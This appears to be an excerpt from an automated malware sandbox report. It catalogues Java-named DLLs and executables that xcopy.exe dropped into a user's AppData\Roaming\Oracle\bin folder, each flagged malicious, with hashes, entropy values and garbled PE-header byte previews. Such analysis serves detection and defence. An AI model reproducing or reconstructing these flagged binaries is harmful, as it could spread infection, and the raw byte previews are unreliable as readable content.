                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... .L.N.L.N.L.N.E..F.N...O.N.N...J.G.N...M.H.N.X.J.M.N.X.O.A.N.L.O...N...K.S.N...K.O.N...N.M.N.....M.N...L.M.N.RichL.N.........PE..L...X.d...........!.........,...............................................0......%.....@..........................\..L....\...........t...............(..........@6..T............................5..@...............4....[..`....................text...T........................... ..`.rdata..............................@..@.data........p.......\..............@....rsrc....t.......v...j..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):265344
                                                                                                                                                                                                                                  Entropy (8bit):6.443196283181112
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:6Tl2xzMTebq2w3MvwF69uTFGMReiDfbadpcx:8lMzMcqV3MY8u5GSl
                                                                                                                                                                                                                                  MD5:1353C1CA88A273B99713B155C5F03F89
                                                                                                                                                                                                                                  SHA1:0BC6D1C254DEBDEFAC33350FEBF275172B25BE6E
                                                                                                                                                                                                                                  SHA-256:5A4729DA6B8566B1E0952365AD13A9438A6534768C908385F7555286BD8312AD
                                                                                                                                                                                                                                  SHA-512:0CB7CBC48CBB320635250DCC202C5F43EDF387806C3A9ADD2347FA49BA80C3AC237845706B3E5E455A16A2CE19E707EC53134CC66C36646E50E99C569688CCA6
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P.............fv......f.......f.......f.......f.......f.......u...... g.............. g...... g...... g...... g...... g......Rich....................PE..L.....d...........!.....f...........j.......................................0......r.....@.........................@....................................(..........0...T...........................p...@............................................text....e.......f.................. ..`.rdata...U.......V...j..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):157824
                                                                                                                                                                                                                                  Entropy (8bit):6.567263460152571
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:HsJGyikbPMJKekaKPDY/lOmH5PndghC6ls47Qzl14VGyILm64Udud7sMxy:Hn44KP6OmZvdghblslzlqVvt6+C
                                                                                                                                                                                                                                  MD5:60D2CE6231CDF97A241B0DADB99549DA
                                                                                                                                                                                                                                  SHA1:30338C28C038B15207E4FF16BBAC84D24016D655
                                                                                                                                                                                                                                  SHA-256:176C8BD46338D63B3C01CACFDF797A70A44DB1E45B4BA5C5D2BFA363AA82C4B4
                                                                                                                                                                                                                                  SHA-512:64832BB79D61411669F969594F8296403D91CFC339CE8FB9543928D7A4A5B16F48F823602C9CFE72C788DE51C6D093E9F1A4EB8F6C5FED5F11B0B4AC52189A3B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........................H.................................................l...............l.......l.......l.......l.$.....l.......Rich............................PE..L...I..d...........!.........................................................p......X.....@.........................0...P............@...............@...(...P..........................................@...............d............................text.............................. ..`.rdata..dl.......n..................@..@.data........0......................@....rsrc........@.......$..............@..@.reloc.......P.......(..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):222336
                                                                                                                                                                                                                                  Entropy (8bit):6.4574232301067545
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:Ex9kyxMH+1zbuJHWScmcJJLzZfg2Uiu/GHBhdO1sCYEcRAXoqGIMiNx5:k/ziJ23DLJgQu/MTdO1sCYEcRAYqV5
                                                                                                                                                                                                                                  MD5:D4B1B969A5735DB99E3A7C06A48C7C58
                                                                                                                                                                                                                                  SHA1:0D58E4E50BCAF644DABFC2E3F9936A3F2F323B35
                                                                                                                                                                                                                                  SHA-256:56271EF265D0CF490A0B7D806DDE15CB86A10AFCBDD02AF837934AC2B11CEDFE
                                                                                                                                                                                                                                  SHA-512:791C8C7D367DFB547F5C5B76840CDA084BB7DD28FD28AD0096D3E7BD9254A52633B647C69D67868963F2D285C0FF44C2A2343C797E40FF1BE4CF73063B015065
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B[..#5H.#5H.#5H.[.H.#5H.[1I.#5H.[6I.#5H.[4I.#5H.H1I.#5H.H3I.#5H.H4I.#5H.#4H."5H.[0I.#5H'Z0I.#5H'Z5I.#5H'Z.H.#5H'Z7I.#5HRich.#5H................PE..L......d...........!.........6......M........ ...............................p.......4....@......................... ...........,.......X&...........<...(...@...,...R.......................R.......Q..@............ ..x...h........................text...\........................... ..`.rdata..p.... ......................@..@.data...P)......."..................@....rsrc...X&.......(..................@..@.reloc...,...@......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):566912
                                                                                                                                                                                                                                  Entropy (8bit):6.05832721351326
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:rf1GZncp8Juzl6GxZGwviVuedZIpvzbfl+MlIKfnJe:z1GZncpQuzl6MZIYedZIp/d+MThe
                                                                                                                                                                                                                                  MD5:F06243B83E8D847C6770F767F90A02C2
                                                                                                                                                                                                                                  SHA1:71EC045C15915C4AA8D0CF78577BFA5E552E72E3
                                                                                                                                                                                                                                  SHA-256:1348DCB6F16767379EAED02E0ED450FC241AA4870551CE248CB9EA97C5BFDBF5
                                                                                                                                                                                                                                  SHA-512:D174D9C5B8840C881BF2E79FC254EF362B7AFDA3360FB31DDD3E7EAD4F307A2FD9125EF7666012600BEA3511B11C03A4B5CEFD593B2F97E7AB67DA07417BFA3C
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..............................a......................2......2...................2......2.c....2......Rich...........PE..L...!..d...........!.....R...8.......1.......p............................................@..........................<..p...pD..|....................~...(.......$...7..............................07..@............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......@..............@....rsrc................T..............@..@.reloc...$.......&...X..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):798848
                                                                                                                                                                                                                                  Entropy (8bit):6.726745599127778
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:EfZd7lzyrI0g4ZTmIb1W+V+uIGvXXpYUdRhu56+xbj8DjPL+7/rleMcf3Mw1qaSG:eZd7lJ4oIb4SfHbH0b+ejrld0Cc2u
                                                                                                                                                                                                                                  MD5:CAF55114A85CB71277803D49C3CA665B
                                                                                                                                                                                                                                  SHA1:1E78378EE43CBDDFF8EFBEB6E7087B3079573E6D
                                                                                                                                                                                                                                  SHA-256:26B17462CB6BA119536B86486923709BE21F0CAC5F18EBB5A18124F65CADFA9F
                                                                                                                                                                                                                                  SHA-512:F0FEC092EA41FBECEA03BB73AF0A190ED6A94A5B7B7AA3A6E726D9F2AF005CFF67C74DAABA6ABEF2BA03D179534E9AEFD3384B8C5A3B04A424AD982DB17D0D4F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........L5.y"f.y"f.y"f...f.y"f..#g.y"f...f.y"f..'g.y"f..&g.y"f..!g.y"f^.'g.y"f^.&gJy"f..#g.y"f^.#g.y"f.y#f.{"f^."g.y"f^..f.y"f^. g.y"fRich.y"f................PE..L...6..d...........!.........N...............................................P.......V....@.................................|...,........................(.......c..P}...............................|..@...............H............................text...(........................... ..`.rdata..............................@..@.data....+..........................@....rsrc...............................@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):139392
                                                                                                                                                                                                                                  Entropy (8bit):6.659472644708503
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:zH5I0FYyjzs9Nr9RnX3o1PcByxzztpnZYmR3uhr26cPD4Bsi+N2kzmxtb:DznZZT1i+G
                                                                                                                                                                                                                                  MD5:D5326D0D393B9B6E799A4DF24C60CAEC
                                                                                                                                                                                                                                  SHA1:85B797C779A1AEFFE22901E7373FF85B00743B9D
                                                                                                                                                                                                                                  SHA-256:4CE5E8DA73B47A735D7A607CBA12FBFF9561A9267682B4F539570FE7F6A41A64
                                                                                                                                                                                                                                  SHA-512:456E68DB2C13F39ECD4FDB19E44357CE6127C5D6832162DCAD8BD0CD666AAC25626A42AFC456933CA7777B6C75729E17F99BE94F79BA3E30215E0739A215A471
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@RR...R...R...[..F...0./.P...0...W...0.+.Y...0.*.X...0.-.V...F./.U...R./.......*.H.......S.......S.....,.S...RichR...........................PE..L...}.d...........!.........|..............................................0.......z....@.............................l...L............................(......L.......T...........................H...@...............d............................text....~.......................... ..`.rdata..$T.......V..................@..@.data...D...........................@....rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):176256
                                                                                                                                                                                                                                  Entropy (8bit):6.840092230622407
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:iM/N10qymCw4vsWET2m3jYVSSSMntxgXXCaMXWrpJrFqUZlGN5eok7W4b7/qv7Qi:vD0dw8bjtvXWFqUCN5eohX
                                                                                                                                                                                                                                  MD5:A0546F0E26E1027EA42A7557183E8BE5
                                                                                                                                                                                                                                  SHA1:21CAAD6EA26FC5FFCA4B239EEEE97ED084186B4F
                                                                                                                                                                                                                                  SHA-256:A739DA8B069E535B894303519BE39B6B3BE9D24B2754AA6DBBBE2CDACBE06046
                                                                                                                                                                                                                                  SHA-512:C0D3306D9B47497039F7E57646B9561F723BD5FC3875EC11696BDEB782E0946B2DA2F595114A5FA9D4BD27FDAC13A9D5A76CC459BAA705E383A6A34CE047180F
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d.;. .U. .U. .U.4.V.-.U.4.P..U.4.Q.2.U.4.T.#.U. .T.y.U.B...%.U.B.P.>.U.B.Q./.U.B.V.4.U..Q.4.U..U.!.U....!.U..W.!.U.Rich .U.........................PE..L.....d...........!......................................................................@..........................k......(o..(........................(...........b..T............................a..@...............0............................text............................... ..`.rdata..............................@..@.data...H............f..............@....rsrc................p..............@..@.reloc...............t..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\j2gss.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):44160
                                                                                                                                                                                                                                  Entropy (8bit):6.720694297813196
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:sIFBCE9U7aPDEpk9dV5yCFj5Nfn32Ca3qkwi2u1yjklsu6hX10+jYi4gPxWEvB:gSPLdfGCa3qkwi2uojklsu6hF0+j74gB
                                                                                                                                                                                                                                  MD5:ABC5D9F3D0C43FB967E2C50540F6D71D
                                                                                                                                                                                                                                  SHA1:F36C69AAF8806E50D0F72F3F8CCEF62D236AFEF9
                                                                                                                                                                                                                                  SHA-256:A105E9462D7FEA78BC65AEFAB1529218E83A00167008510930BD4FBF50605509
                                                                                                                                                                                                                                  SHA-512:5ADA6DC093D3838D1163BAD903897F33F21698AF8700FB7C4DA55944CEA92248D01A5364CCCEBBB296F1F7922B8F1DF17D7A9900E52424346A6B3A0FD401B57B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|XY...Y...Y...P.._...;...[...M...Z...Y...s...;...R...;...S...;...X.......Z.......X.......X.......X...RichY...................PE..L...|.d...........!.....B...B.......H.......`...........................................@.........................`... .......x........................(.......... ~..T...........................`}..@............`...............................text....A.......B.................. ..`.rdata.......`...0...F..............@..@.data...$............v..............@....rsrc................x..............@..@.reloc...............|..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23168
                                                                                                                                                                                                                                  Entropy (8bit):6.700135798939824
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:W8rJcy7XCJm0jcO2w1yoZ7oFcrIYi1ozPxh8E9VF0NyoEBv:TJlXCxZLoFcUYi+PxWEy6v
                                                                                                                                                                                                                                  MD5:AF917CCA99DF6CF3CF56176C25A1CC80
                                                                                                                                                                                                                                  SHA1:9D56EFD3341DDC63CE228A01B781316002F103FA
                                                                                                                                                                                                                                  SHA-256:75DDCECB91D83EE66E3E0329ED296B7FF23EB29F1BC6353194E98F83939D02FB
                                                                                                                                                                                                                                  SHA-512:F1C5AE4E6D03F7263B45C64846506134620366288AAE5785DC9CE1BBDC038627A7F0DDA3ACA34CBF59FC70759A839BCDA415C9E18C8A45429D928B9414B23B19
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........J...$_..$_..$_.._.$_..%^.$_..._..$_..!^.$_.. ^.$_..'^.$_..%^.$_..%_.$_A. ^.$_A.$^..$_A.._..$_A.&^..$_Rich..$_........PE..L...|.d...........!................{........0...............................p.......&....@.........................p6......P9.......P...............2...(...`.......2..T...........................P1..@............0...............................text...A........................... ..`.rdata.. ....0......................@..@.data........@.......*..............@....rsrc........P.......,..............@..@.reloc.......`.......0..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60544
                                                                                                                                                                                                                                  Entropy (8bit):6.676826050423698
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:WghZ0s2bCZ8gJ/DKWT4SilNAoJTOdcoGNahV6VCv593vhRVviuXg98KFYVinbsPt:WghZH2bCquDKWT4nnAokcDoymGxa
                                                                                                                                                                                                                                  MD5:77E51629FDBD34C31F96ABBC67EF51FE
                                                                                                                                                                                                                                  SHA1:001946CC005C31B09BCAE6BE10F697126F106BCB
                                                                                                                                                                                                                                  SHA-256:EEAF460AA12FBEDBD84D76A897D6EE42840AE38E294DEBF175F9DEA28494DF24
                                                                                                                                                                                                                                  SHA-512:69BE6A46219F894F35AE1891E4A0A1CB70B1A03BCD88DC67F0DE334C0B4A096DAFB351EBF8DBD8ECABE397DBF3FD4F18748CE673E44B607DAEC15F8BC3B06D08
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Z..^..............|.....|...................1...|.......|.......|.......................................Rich............................PE..L...|.d...........!.........>...........................................................@.............................................................(......@...p...T...............................@............................................text.............................. ..`.rdata..x-..........................@..@.data...............................@....rsrc...............................@..@.reloc..@...........................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):25728
                                                                                                                                                                                                                                  Entropy (8bit):6.7084252487488065
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:q5/IUTZjGWwEIWJ4jEkAI3DjE1c1u3IYi1oModSPxh8E9VF0NyB4/b:2/tTZ6HzWWE1ou4YitwSPxWE3+b
                                                                                                                                                                                                                                  MD5:AE7032182FC45C7DCF055884642996BE
                                                                                                                                                                                                                                  SHA1:C336B3FADEB37CDC1616A785C04731AED1FFC7CC
                                                                                                                                                                                                                                  SHA-256:9638CFF048C5162C89C4DB1D3DFE0A9F2B7E1785F5F2602695D2613C8FCA2165
                                                                                                                                                                                                                                  SHA-512:6A6F774170A9D8FE6354D9F4790C85CCD25B7E63DDBDE9666FAFE5E5813A781AAA0805CB83423BE50890665759601DB13133E200B72AD64FCD701D8590E1E5B3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........*...y...y...y..2y...y..x...y..x...y..x...y..x...y...x...y...y...y9..x...y9..x...y9.^y...y9..x...yRich...y........PE..L.....d...........!......... ......) .......0............................................@.........................`;......(<.......`...............<...(...p..\....7..T...........................H6..@............0...............................text............................... ..`.rdata..B....0......................@..@.data........P.......2..............@....rsrc........`.......4..............@..@.reloc..\....p.......8..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):39552
                                                                                                                                                                                                                                  Entropy (8bit):6.657154445904984
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:SOVwOpnsKYHjWbSPRs+BTvfrjuqbVUZ4/tYi0sPxWE2C:AkshHPPRs+BjfrjUZ417jPxR
                                                                                                                                                                                                                                  MD5:13A2B04E4FF2F764467D71CB85054E90
                                                                                                                                                                                                                                  SHA1:D2DBC61F9D98FA4235B70E44E79FF10F7C551D4E
                                                                                                                                                                                                                                  SHA-256:B1B1E18BF6E4CD10AB7609E8F80C16D2AA46AC32D2CCFB8FC890FAD3084AA801
                                                                                                                                                                                                                                  SHA-512:F2D8D5C1F6EDA16899900E7B9FE160AC4555256A2E5DF65191E385D08DFD2048B47541248150D3603DC44AE6CF4B0458B4FFFA384FBBE71EC094E63EAD784EE3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.......................................@.................................$i.......................r...(......<....b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc..<............l..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):22656
                                                                                                                                                                                                                                  Entropy (8bit):6.8038311733525605
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:yP/iXJTRjC13DMq82+1efTIYi1oQPxh8E9VF0Nye3m:yP/iXGpb8FEfcYiPPxWEQW
                                                                                                                                                                                                                                  MD5:BA6122E739C1799AC9376C345E18632C
                                                                                                                                                                                                                                  SHA1:924630B550A2118983ACE90174A6EEA3F057860F
                                                                                                                                                                                                                                  SHA-256:63F0D4F66D2020499EEBA743DB336D2B3830D7B3FEB115721D7CA1D982BB7A99
                                                                                                                                                                                                                                  SHA-512:EC7282047F7C828FFF53A9673A5F4601E4193DFAFFF6FE63EAED37FD2DC31FB2772D3C76CC099C887FA5FAB5D50368212EA79B46C1E3D09D333316D53FCB7AD8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................`.......Y....@..................................&.......@..d............0...(...P......h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\java.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):142464
                                                                                                                                                                                                                                  Entropy (8bit):6.759982404275612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:DssCRbsL4X9K5X+QVEjaQL/FuuTNi9OexsrMf01WOyxf:YsUbaP5X1WNOH9/
                                                                                                                                                                                                                                  MD5:750F1A51C88BE9E2C4D7970D3FBB745F
                                                                                                                                                                                                                                  SHA1:DDCEE672E1AB3425E7937CF145F082E6F26CA5E1
                                                                                                                                                                                                                                  SHA-256:801FF1959ACD44F237043EC50ADD30D6306BC283EC288640CBBFF9CBACC7B19D
                                                                                                                                                                                                                                  SHA-512:F827C979C548F36B125A46931186A662AD89D94E32EDE78A680EBA8A6D475DF89D47AD997FE7D74FE122E0D92EA689648586E74E51CECE55BC7C128068D15A87
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~6}.:W..:W..:W..3/..*W..X/..8W..X/..0W..X/..?W...<..<W..X/..5W...<..;W......?W..:W...V......VW......;W.....;W......;W..Rich:W..........................PE..L...~.d...........!.....F...........K.......`...............................@............@..............................B......,........................(... ..$...P...T...............................@............`......l...@....................text....D.......F.................. ..`.rdata..F....`.......J..............@..@.data...$...........................@....rsrc...............................@..@.reloc..$.... ......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\java.exe

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):257664
                                                                                                                                                                                                                                  Entropy (8bit):6.804363186795068
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:w+TwJLYbH0QQchx73BeFStIhEWDoZvynCME:T6EbH0j4x7R6SvyCME
                                                                                                                                                                                                                                  MD5:9DAA53BAB2ECB33DC0D9CA51552701FA
                                                                                                                                                                                                                                  SHA1:2BF0F6B7A5A3DCCBE47CC464D63B52E0C3A85F0D
                                                                                                                                                                                                                                  SHA-256:E0D055BB9D81BC554A75176FE821ADD4B5DC18AD3557E9A731B4F6D3EBFAD751
                                                                                                                                                                                                                                  SHA-512:8F1076AEB7FE26ACF4A9D0F2E05FA841A9F5A1040F826A33226D361427DEE88150D46530C87E67E509E8174B968D53D1B5EABC5BCBE1402EF72D442AA08337D1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..................................<....@..................................!..d....P...................(..........P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):30848
                                                                                                                                                                                                                                  Entropy (8bit):6.78330656156103
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:S+dZDd1be3tiktnTnfPPohw64TJjjo5zArHOxIYi1owPxh8E9VF0NyznFjKt:PDXbXcfHzhTYaHOmYifPxWEJA
                                                                                                                                                                                                                                  MD5:2C9D9BCB96F5E3455FD096E6C49F0A43
                                                                                                                                                                                                                                  SHA1:D8C6F11F290E8FECBD1DD14AAB97346009BC7CBF
                                                                                                                                                                                                                                  SHA-256:44CD1C1104EAC19CF407FBC997326D414E1838899DD8AC352A1580CEA7E55C4A
                                                                                                                                                                                                                                  SHA-512:46D57CAEA92554B6F6067EF4C7F333DB92C9B87E8F697086AA1EC37113D59C73869813A9363BCB46ABD6E8FD68480BD37725370F7A876D16A2B5AC59684551B8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]..$..w..w..w...w..w{..v..w...v..w..w2.w{..v..w{..v..w{..v..w...v..w...v..w..nw..w...v..wRich..w........PE..L...}.d...........!.....2...........7.......P......................................Z.....@.........................pY..|....Y.......p...............P...(......t... U..T...........................`T..@............P...............................text....0.......2.................. ..`.rdata..n....P.......6..............@..@.data...\....`.......F..............@....rsrc........p.......H..............@..@.reloc..t............L..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):222848
                                                                                                                                                                                                                                  Entropy (8bit):6.561063206660714
                                                                                                                                                                                                                                  Encrypted:false
